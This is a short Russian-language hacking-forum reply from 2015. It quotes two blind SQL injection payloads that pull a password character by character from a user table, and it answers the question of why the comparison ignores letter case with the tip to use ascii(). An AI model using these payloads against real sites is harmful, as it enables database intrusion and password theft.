
12.05.2015, 21:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
Почему при ручной эксплуатации blind sql, запросы:
Код:
Code:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле?
используйте ascii()
|
|
|